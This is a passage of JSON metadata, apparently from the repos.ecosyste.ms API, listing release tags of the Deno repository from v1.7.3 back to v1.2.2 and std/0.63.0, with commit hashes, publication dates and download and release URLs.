GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0